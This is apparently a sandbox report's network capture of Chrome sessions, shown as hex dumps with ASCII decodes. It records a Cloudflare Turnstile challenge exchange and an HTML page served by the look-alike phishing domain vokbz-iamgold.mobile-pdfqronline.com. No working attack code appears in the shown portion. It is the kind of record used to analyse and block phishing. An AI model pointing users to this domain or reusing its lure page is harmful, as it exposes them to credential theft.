                                                                                                                                                Data Ascii: (i)},'QdyLl':function(h,i){return h*i},'USFxF':function(h,i){return h===i},'CHCtz':function(h,i){return h+i},'ocYOR':function(h,i){return h+i}},e=String[jv(1264)],f={'h':function(h){return null==h?'':f.g(h,6,function(i,jw){return jw=b,jw(1771)[jw(883)](i)


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                19192.168.2.1649741104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:41 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/736896047:1730132405:5SGzvlJZj4ad9Fw5YQ-DPoYWF7p9UG71nocFwUBA5ZI/8d9c68ac0f68e79a/_gFYOdWvOno18EFRhpnXawTigdcRjwUS3i.fqCCsr9g-1730134058-1.1.1.1-cLx_S1QbgF9.LxN6AtmEfd6QgduHNIg5gmCjicGVJiRTT3MnfZL.NQSkb4wRylmA HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Content-Length: 3918
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                CF-Challenge: _gFYOdWvOno18EFRhpnXawTigdcRjwUS3i.fqCCsr9g-1730134058-1.1.1.1-cLx_S1QbgF9.LxN6AtmEfd6QgduHNIg5gmCjicGVJiRTT3MnfZL.NQSkb4wRylmA
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/shez3/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:41 UTC3918OUTData Raw: 76 5f 38 64 39 63 36 38 61 63 30 66 36 38 65 37 39 61 3d 44 38 42 63 76 63 4f 63 73 63 4d 63 58 63 35 37 66 24 37 4a 66 59 63 6b 4b 4e 52 65 51 66 33 66 4c 45 63 24 61 63 66 68 42 66 54 63 59 52 62 5a 66 49 63 62 4b 52 63 4a 51 59 42 66 51 63 31 38 51 62 6f 66 44 37 72 66 6b 5a 34 48 63 31 44 61 58 75 65 63 66 6e 41 34 42 66 35 66 4e 61 6e 34 66 32 63 62 74 66 33 34 65 31 33 67 5a 35 33 64 48 37 63 31 49 67 6c 66 76 72 31 6b 66 6c 32 42 25 32 62 47 69 34 61 33 44 36 48 62 44 63 63 41 47 6b 65 34 4b 52 66 65 47 66 6e 37 32 44 5a 75 52 66 58 4b 66 4c 6b 2b 32 47 48 48 62 70 65 47 68 70 35 37 59 45 62 68 38 61 66 6b 59 57 7a 65 30 56 33 30 68 5a 66 66 68 38 48 5a 61 66 35 68 34 38 69 72 31 4e 66 62 65 61 6b 35 42 66 77 48 62 66 6e 72 31 31 66 4b 31 50 66 31
                                                                                                                                                Data Ascii: v_8d9c68ac0f68e79a=D8BcvcOcscMcXc57f$7JfYckKNReQf3fLEc$acfhBfTcYRbZfIcbKRcJQYBfQc18QbofD7rfkZ4Hc1DaXuecfnA4Bf5fNan4f2cbtf34e13gZ53dH7c1Iglfvr1kfl2B%2bGi4a3D6HbDccAGke4KRfeGfn72DZuRfXKfLk+2GHHbpeGhp57YEbh8afkYWze0V30hZffh8HZaf5h48ir1Nfbeak5BfwHbfnr11fK1Pf1
                                                                                                                                                2024-10-28 16:47:41 UTC738INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:41 GMT
                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                Content-Length: 88424
                                                                                                                                                Connection: close
                                                                                                                                                cf-chl-gen: KMyDueUzaGnuk7vfg4dkjfJdqh8T4R93ljt3XPi7QepUhUNh+X4IhEnfANmbdn32uMMUTE+WuhBomc5kkMLZg5SSoMi2GQr5LBA6w6n3lpT+HUav0f7gcdHSH9uZ6jyMdaj5AhFodH83ogyQhAnRsQ7VrA2hRws2NAtYDBNzPo8FTmpVBCLmgB+MXbbw+nTWOM8J28iT+Fu3YBg+v1sgzpdUgO/OksAEQnXMwM0UtBIhLy9iBtbBcegiL+XDyLCfBy2hQ6PiXCfZZW+6Z1uZxbKbKOE2xDjvHj07M7zXx/G0fhkU+B6B1Q9OULFtOu3FDCk9HgrIxCHEgEZ+4dkaMtCWIsRzcEaD57F49FvkYNNqFZwZiV0cVSVic7lio7dEs5SPj3CawTRgDwAxdCUBvNZNo8apil/3wt+d4kT9HxOh8gp9t++s8+2h83s4FG+DN/NLvt+iqGIvp6pXkDgENDzIUHvQe8gISf69LLY=$ua/bxXUf//Dkhh3S
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c68bd28834638-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:47:41 UTC631INData Raw: 6a 6f 47 48 66 6f 71 54 53 33 31 63 68 70 61 51 68 70 69 4f 6c 5a 56 51 55 71 57 6f 5a 30 32 6c 6d 4a 36 56 6f 61 70 69 6c 4a 46 6e 6c 58 5a 68 6e 47 4e 34 58 72 61 70 72 36 61 79 75 33 4f 6c 6f 6e 6d 6d 68 33 4b 75 64 49 6c 76 63 48 46 79 79 62 58 48 64 72 61 37 76 37 6d 2b 78 4d 6d 39 77 74 54 5a 67 71 43 45 78 74 6a 4f 33 64 62 50 32 65 44 67 79 5a 2f 4e 72 48 79 54 6c 4a 57 57 37 64 6e 72 6d 75 37 68 36 2b 4c 52 35 66 4c 33 36 50 66 35 70 73 53 6f 36 76 7a 79 41 76 72 7a 2f 51 55 46 37 63 54 78 30 4b 43 68 75 4c 6d 36 75 77 59 45 76 73 63 41 42 51 6b 44 43 41 34 54 42 77 77 65 49 39 6e 34 4a 69 4c 38 35 74 48 76 38 50 48 56 35 75 44 59 4e 63 54 46 33 4e 33 65 33 2b 44 68 34 75 4d 6b 4b 53 30 6e 4c 44 49 33 4b 7a 42 43 52 2b 38 4f 38 55 37 64 39 50 58
                                                                                                                                                Data Ascii: joGHfoqTS31chpaQhpiOlZVQUqWoZ02lmJ6VoapilJFnlXZhnGN4Xrapr6ayu3Olonmmh3KudIlvcHFyybXHdra7v7m+xMm9wtTZgqCExtjO3dbP2eDgyZ/NrHyTlJWW7dnrmu7h6+LR5fL36Pf5psSo6vzyAvrz/QUF7cTx0KChuLm6uwYEvscABQkDCA4TBwweI9n4JiL85tHv8PHV5uDYNcTF3N3e3+Dh4uMkKS0nLDI3KzBCR+8O8U7d9PX
                                                                                                                                                2024-10-28 16:47:41 UTC1369INData Raw: 65 55 6d 4e 6c 61 69 56 50 54 6b 52 43 5a 53 30 65 4c 43 42 34 61 33 46 6f 64 48 30 31 5a 32 78 77 61 6d 39 31 65 6d 35 2f 67 59 5a 42 59 47 35 77 68 45 31 46 4a 44 73 38 50 54 34 2f 51 45 46 43 51 30 52 46 52 6e 43 50 65 34 52 64 5a 6b 32 6c 6d 4a 36 56 6f 61 70 69 6c 4a 6d 64 6c 35 79 69 70 35 75 73 72 72 4e 75 70 49 75 58 72 62 4b 72 6d 6e 52 54 61 6d 74 73 62 57 35 76 63 48 46 79 63 33 52 31 75 5a 72 47 79 59 75 56 66 4e 54 48 7a 63 54 51 32 5a 48 44 79 4d 7a 47 79 39 48 57 79 74 76 64 34 70 33 64 31 5a 35 39 6c 4a 57 57 6c 35 69 5a 6d 70 75 63 6e 5a 36 66 32 4e 6e 77 36 65 6d 38 77 4b 63 41 38 76 6a 76 2b 77 57 38 35 2b 67 41 2b 50 6a 4c 77 61 43 68 75 4c 6d 36 75 37 79 39 76 72 2f 41 77 63 4c 44 47 42 4d 54 2f 50 6e 67 35 4d 73 4d 45 52 55 50 46 42
                                                                                                                                                Data Ascii: eUmNlaiVPTkRCZS0eLCB4a3FodH01Z2xwam91em5/gYZBYG5whE1FJDs8PT4/QEFCQ0RFRnCPe4RdZk2lmJ6VoapilJmdl5yip5usrrNupIuXrbKrmnRTamtsbW5vcHFyc3R1uZrGyYuVfNTHzcTQ2ZHDyMzGy9HWytvd4p3d1Z59lJWWl5iZmpucnZ6f2Nnw6em8wKcA8vjv+wW85+gA+PjLwaChuLm6u7y9vr/AwcLDGBMT/Png5MsMERUPFB
                                                                                                                                                2024-10-28 16:47:41 UTC1369INData Raw: 47 52 6f 62 59 47 68 76 5a 6d 63 79 50 43 4e 37 62 6e 52 72 64 34 41 34 61 6d 39 7a 62 58 4a 34 66 58 47 43 68 49 6c 45 65 34 4f 4b 67 59 4a 4e 53 53 67 2f 51 45 46 43 51 30 52 46 52 6b 64 49 53 55 70 77 67 49 2b 43 59 57 70 52 71 5a 79 69 6d 61 57 75 5a 70 69 64 6f 5a 75 67 70 71 75 66 73 4c 4b 33 63 6f 71 61 71 5a 78 37 64 6c 56 73 62 57 35 76 63 48 46 79 63 33 52 31 64 6e 66 4f 76 4d 32 79 73 49 2b 59 66 39 66 4b 30 4d 66 54 33 4a 54 47 79 38 2f 4a 7a 74 54 5a 7a 64 37 67 35 61 44 70 31 2b 6a 4e 79 36 71 6c 68 4a 75 63 6e 5a 36 66 6f 4b 47 69 6f 36 53 6c 70 74 58 62 31 66 48 67 78 4d 65 75 42 2f 6b 41 39 67 4d 4d 77 2f 58 36 2f 76 6a 39 42 41 6e 38 44 68 41 56 7a 2f 44 32 38 41 33 37 33 39 53 7a 79 73 76 4d 7a 63 37 50 30 4e 48 53 30 39 54 56 2f 41 49
                                                                                                                                                Data Ascii: GRobYGhvZmcyPCN7bnRrd4A4am9zbXJ4fXGChIlEe4OKgYJNSSg/QEFCQ0RFRkdISUpwgI+CYWpRqZyimaWuZpidoZugpqufsLK3coqaqZx7dlVsbW5vcHFyc3R1dnfOvM2ysI+Yf9fK0MfT3JTGy8/JztTZzd7g5aDp1+jNy6qlhJucnZ6foKGio6SlptXb1fHgxMeuB/kA9gMMw/X6/vj9BAn8DhAVz/D28A3739SzysvMzc7P0NHS09TV/AI
                                                                                                                                                2024-10-28 16:47:41 UTC1369INData Raw: 57 56 31 49 69 35 42 4a 57 78 35 64 33 5a 4e 63 32 31 2f 55 58 35 30 64 6c 56 30 64 33 31 37 63 6b 42 36 6a 49 31 33 68 6f 4b 58 66 55 47 41 51 34 2b 4b 6e 31 57 4c 6b 59 75 64 62 35 79 53 6c 48 47 6c 57 70 79 59 72 56 5a 63 57 4b 53 66 74 49 69 69 72 47 68 70 59 57 64 6a 64 6e 70 38 70 49 4e 54 61 6d 74 73 62 57 35 76 63 48 46 79 63 33 52 31 30 32 46 69 65 58 70 37 66 48 31 2b 66 34 43 42 67 6f 4f 45 31 38 76 62 33 64 76 59 69 38 37 68 33 64 43 59 34 39 66 6e 6e 62 43 41 6c 35 69 5a 6d 70 75 63 6e 5a 37 38 69 6f 75 69 6f 36 53 6c 70 71 65 6f 71 65 6e 75 38 75 7a 78 39 2f 7a 77 39 51 67 4e 77 2b 34 49 45 51 76 52 75 39 6d 39 78 71 6e 41 77 63 4c 44 78 4d 58 47 78 38 6a 4a 79 73 73 52 48 52 49 6c 48 68 63 68 4b 4f 49 59 4a 68 77 79 77 39 72 62 33 4e 33 65
                                                                                                                                                Data Ascii: WV1Ii5BJWx5d3ZNc21/UX50dlV0d317ckB6jI13hoKXfUGAQ4+Kn1WLkYudb5ySlHGlWpyYrVZcWKSftIiirGhpYWdjdnp8pINTamtsbW5vcHFyc3R102FieXp7fH1+f4CBgoOE18vb3dvYi87h3dCY49fnnbCAl5iZmpucnZ78iouio6Slpqeoqenu8uzx9/zw9QgNw+4IEQvRu9m9xqnAwcLDxMXGx8jJyssRHRIlHhchKOIYJhwyw9rb3N3e
                                                                                                                                                2024-10-28 16:47:41 UTC1369INData Raw: 6f 31 61 6e 68 75 68 44 70 32 66 48 31 31 67 31 70 6e 59 57 46 43 49 54 67 35 4f 6a 73 38 50 54 34 2f 51 45 46 43 51 34 69 55 69 5a 79 56 6a 70 69 66 57 70 57 54 6b 4a 52 66 6c 61 4b 68 70 5a 65 70 6e 58 32 70 6e 72 47 71 6f 36 32 30 6b 62 47 32 72 62 6d 76 74 72 5a 78 72 72 71 76 77 72 75 30 76 73 57 41 74 63 4f 35 7a 34 43 45 59 33 70 37 66 48 31 2b 66 34 43 42 67 6f 4f 45 68 64 33 51 31 73 33 5a 34 70 72 4d 30 64 58 50 31 4e 72 66 30 2b 54 6d 36 36 62 68 31 4e 50 51 39 4c 57 74 38 66 62 6e 39 66 33 59 36 2f 50 74 37 50 37 36 2f 72 57 31 41 77 55 4c 2f 76 69 37 76 73 54 36 43 41 63 4c 2f 41 38 44 34 67 38 45 46 78 41 4a 45 78 72 32 46 78 77 54 48 78 55 63 48 4e 59 6e 47 69 41 58 49 79 7a 6a 46 68 73 66 47 52 34 6b 4b 52 30 75 4d 44 58 76 4b 78 34 64 47
                                                                                                                                                Data Ascii: o1anhuhDp2fH11g1pnYWFCITg5Ojs8PT4/QEFCQ4iUiZyVjpifWpWTkJRflaKhpZepnX2pnrGqo620kbG2rbmvtrZxrrqvwru0vsWAtcO5z4CEY3p7fH1+f4CBgoOEhd3Q1s3Z4prM0dXP1Nrf0+Tm66bh1NPQ9LWt8fbn9f3Y6/Pt7P76/rW1AwUL/vi7vsT6CAcL/A8D4g8EFxAJExr2FxwTHxUcHNYnGiAXIyzjFhsfGR4kKR0uMDXvKx4dG
                                                                                                                                                2024-10-28 16:47:41 UTC1369INData Raw: 37 63 59 4e 35 67 49 41 37 50 54 57 52 49 54 67 35 4f 6a 73 38 50 54 34 2f 51 45 46 43 51 30 52 46 52 6b 64 49 53 55 70 4c 6f 6f 36 67 54 35 57 6a 70 4b 4b 6d 66 71 53 64 70 34 69 63 70 61 47 67 73 6c 39 39 59 62 6d 73 73 71 6d 31 76 6e 61 56 76 63 4b 2f 66 58 61 30 78 72 62 41 78 34 4c 48 75 37 6a 4c 79 4d 69 45 6c 32 64 2b 66 34 43 42 67 6f 4f 45 68 59 61 48 69 49 6d 4b 69 34 79 4e 6a 6f 2b 51 6b 65 6e 63 34 74 6e 6c 37 71 62 67 77 4d 44 6c 74 61 62 6b 38 76 50 78 39 63 33 7a 37 50 62 58 36 2f 54 77 37 77 4b 36 72 2f 50 35 39 51 67 4e 77 62 61 2b 44 67 7a 48 42 50 30 4d 41 77 77 47 46 4d 6e 4d 33 36 2f 47 78 38 6a 4a 79 73 76 4d 7a 63 37 50 30 4e 48 53 30 39 54 56 4e 4f 50 59 36 75 72 6b 39 38 66 65 33 2b 44 68 34 75 50 6b 35 65 62 6e 36 4f 6b 30 4d 76
                                                                                                                                                Data Ascii: 7cYN5gIA7PTWRITg5Ojs8PT4/QEFCQ0RFRkdISUpLoo6gT5WjpKKmfqSdp4icpaGgsl99Ybmssqm1vnaVvcK/fXa0xrbAx4LHu7jLyMiEl2d+f4CBgoOEhYaHiImKi4yNjo+Qkenc4tnl7qbgwMDltabk8vPx9c3z7PbX6/Tw7wK6r/P59QgNwba+DgzHBP0MAwwGFMnM36/Gx8jJysvMzc7P0NHS09TVNOPY6urk98fe3+Dh4uPk5ebn6Ok0Mv
                                                                                                                                                2024-10-28 16:47:41 UTC1369INData Raw: 50 54 56 55 4e 30 56 4b 51 35 59 6d 4a 7a 34 2f 51 45 46 43 51 30 52 46 52 6b 64 49 53 5a 4f 52 56 4b 53 58 6e 5a 53 67 71 57 47 4f 68 71 47 6c 63 47 65 41 6a 49 4f 43 71 58 46 6f 61 4c 47 7a 74 4c 53 34 75 37 32 33 73 37 37 41 74 72 46 38 73 38 44 41 78 37 33 44 79 37 6a 4d 77 73 6e 4a 67 34 61 48 66 39 74 72 67 6f 4f 45 68 59 61 48 69 49 6d 4b 69 34 79 4e 6a 6f 2b 51 6b 65 6e 63 34 74 6e 6c 37 71 62 73 33 2b 2f 51 35 75 76 6b 37 2f 62 32 71 2b 72 36 39 4f 72 38 38 76 6e 35 74 4c 61 75 43 35 71 78 73 72 4f 30 74 62 61 33 75 4c 6d 36 75 37 79 39 76 72 2f 41 77 63 4c 44 78 42 30 51 46 67 30 5a 49 74 6b 64 48 2f 34 61 43 2b 62 61 33 4f 2b 2f 31 74 66 59 32 64 72 62 33 4e 33 65 33 2b 44 68 34 75 50 6b 35 55 54 7a 36 50 72 36 2b 2f 7a 32 43 74 6e 77 38 66 4c
                                                                                                                                                Data Ascii: PTVUN0VKQ5YmJz4/QEFCQ0RFRkdISZORVKSXnZSgqWGOhqGlcGeAjIOCqXFoaLGztLS4u723s77AtrF8s8DAx73Dy7jMwsnJg4aHf9trgoOEhYaHiImKi4yNjo+Qkenc4tnl7qbs3+/Q5uvk7/b2q+r69Or88vn5tLauC5qxsrO0tba3uLm6u7y9vr/AwcLDxB0QFg0ZItkdH/4aC+ba3O+/1tfY2drb3N3e3+Dh4uPk5UTz6Pr6+/z2Ctnw8fL
                                                                                                                                                2024-10-28 16:47:41 UTC1369INData Raw: 6a 73 38 50 54 34 2f 51 45 47 5a 69 34 32 52 69 30 39 50 6c 5a 4f 52 6b 55 32 56 6e 70 57 6b 55 71 4b 69 58 46 39 42 57 46 6c 61 57 31 78 64 58 6c 39 67 59 57 4a 6a 74 37 79 76 75 36 75 78 63 71 71 6e 72 4b 6d 41 72 61 35 37 63 38 39 66 64 6e 64 34 65 58 70 37 66 48 31 2b 66 34 43 42 67 6f 4f 45 68 63 6e 49 32 38 36 52 74 4d 4b 32 35 62 53 6c 6d 4b 78 39 6c 4a 57 57 6c 36 44 66 37 2b 6e 66 38 65 66 75 37 71 6d 72 6f 77 43 50 6b 4a 47 6f 71 61 71 72 72 4b 32 75 72 77 66 79 42 62 50 33 2f 51 50 36 44 52 4b 36 32 4c 7a 38 41 67 59 41 42 51 73 51 42 41 6b 62 49 41 51 4a 44 68 49 4d 45 52 63 63 45 42 55 6e 4c 4f 49 43 4c 79 73 47 37 78 6a 32 78 74 33 65 33 2b 44 68 34 75 50 6b 50 43 67 36 36 42 59 53 50 6b 55 79 2f 75 38 4f 38 54 6c 4a 51 7a 6c 4c 51 55 68 49
                                                                                                                                                Data Ascii: js8PT4/QEGZi42Ri09PlZORkU2VnpWkUqKiXF9BWFlaW1xdXl9gYWJjt7yvu6uxcqqnrKmAra57c89fdnd4eXp7fH1+f4CBgoOEhcnI286RtMK25bSlmKx9lJWWl6Df7+nf8efu7qmrowCPkJGoqaqrrK2urwfyBbP3/QP6DRK62Lz8AgYABQsQBAkbIAQJDhIMERccEBUnLOICLysG7xj2xt3e3+Dh4uPkPCg66BYSPkUy/u8O8TlJQzlLQUhI
                                                                                                                                                2024-10-28 16:47:41 UTC1369INData Raw: 47 55 55 59 65 55 6c 49 71 4a 6e 56 4b 68 56 57 69 67 6c 4b 53 6d 70 4b 46 55 70 37 4f 61 6d 61 32 64 6f 32 53 30 5a 37 71 79 70 72 61 34 74 72 4e 6d 75 63 58 47 64 71 61 70 64 6f 6e 42 74 63 58 48 78 63 4a 31 6c 38 6e 4b 75 74 4f 4a 77 73 2f 4e 7a 49 6a 50 78 39 71 45 75 4d 76 62 6b 4e 71 54 6c 4f 6e 54 6e 4e 2b 31 73 72 65 32 71 37 4c 6b 32 4f 37 69 34 64 7a 77 37 50 43 74 37 4f 4c 77 36 76 6e 6d 37 65 79 30 37 37 6a 79 39 64 37 6e 32 63 6a 4f 41 66 51 4c 2f 76 33 34 44 51 6b 4e 79 51 6e 2b 44 51 63 57 41 77 6f 4a 47 4e 45 4e 31 52 6f 55 36 78 6f 61 33 2b 73 58 32 4e 72 65 47 75 49 6b 47 53 77 65 37 66 63 7a 4a 69 77 6a 4c 7a 6a 76 49 69 63 72 4a 53 6f 77 4e 53 6b 36 50 45 48 37 47 53 4d 71 4a 77 55 50 53 7a 64 4a 39 30 45 58 41 67 6b 45 47 56 4e 53 57
                                                                                                                                                Data Ascii: GUUYeUlIqJnVKhVWiglKSmpKFUp7Oama2do2S0Z7qypra4trNmucXGdqapdonBtcXHxcJ1l8nKutOJws/NzIjPx9qEuMvbkNqTlOnTnN+1sre2q7Lk2O7i4dzw7PCt7OLw6vnm7ey077jy9d7n2cjOAfQL/v34DQkNyQn+DQcWAwoJGNEN1RoU6xoa3+sX2NreGuIkGSwe7fczJiwjLzjvIicrJSowNSk6PEH7GSMqJwUPSzdJ90EXAgkEGVNSW


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                20192.168.2.1649742188.114.97.34436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:42 UTC906OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                Host: vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                Referer: https://vokbz-iamgold.mobile-pdfqronline.com/11384/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:42 UTC878INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:42 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Last-Modified: Mon, 28 Oct 2024 10:57:45 GMT
                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EKx2GItR%2BWpuRkb943KUzAcKz%2FhDPdwQSbOYHzjgVptK7XGqRm8%2BlZoG%2B%2Ff896j6SognLBXdbbSuKNhvPpANd4oWnGi21ki34gDiKEaJC3snhviGOtOBfRKV1Go5RfOXaFLICecikhVKk%2Fk7M0Yl3erUA%2BEtpuo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c68c08abf4588-ATL
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=18486&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2858&recv_bytes=1484&delivery_rate=157118&cwnd=32&unsent_bytes=0&cid=e7f9abb4abc0cfb0&ts=354&x=0"
                                                                                                                                                2024-10-28 16:47:42 UTC491INData Raw: 31 64 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75
                                                                                                                                                Data Ascii: 1dfe<!DOCTYPE html><html lang="en" dir="ltr" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" class="responsive"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/tu
                                                                                                                                                2024-10-28 16:47:42 UTC1369INData Raw: 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a
                                                                                                                                                Data Ascii: a name="referrer" content="origin-when-cross-origin"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no"> <meta name="format-detection" content="telephone=no"><style>
                                                                                                                                                2024-10-28 16:47:42 UTC1369INData Raw: 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34
                                                                                                                                                Data Ascii: 0 auto;width:100%;max-width:60rem;line-height:1.125rem;font-size:.75rem}.footer-inner{border-top:1px solid #d9d9d9;padding-top:1rem;padding-bottom:1rem}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (max-width:720px){.main-content{margin-top:4
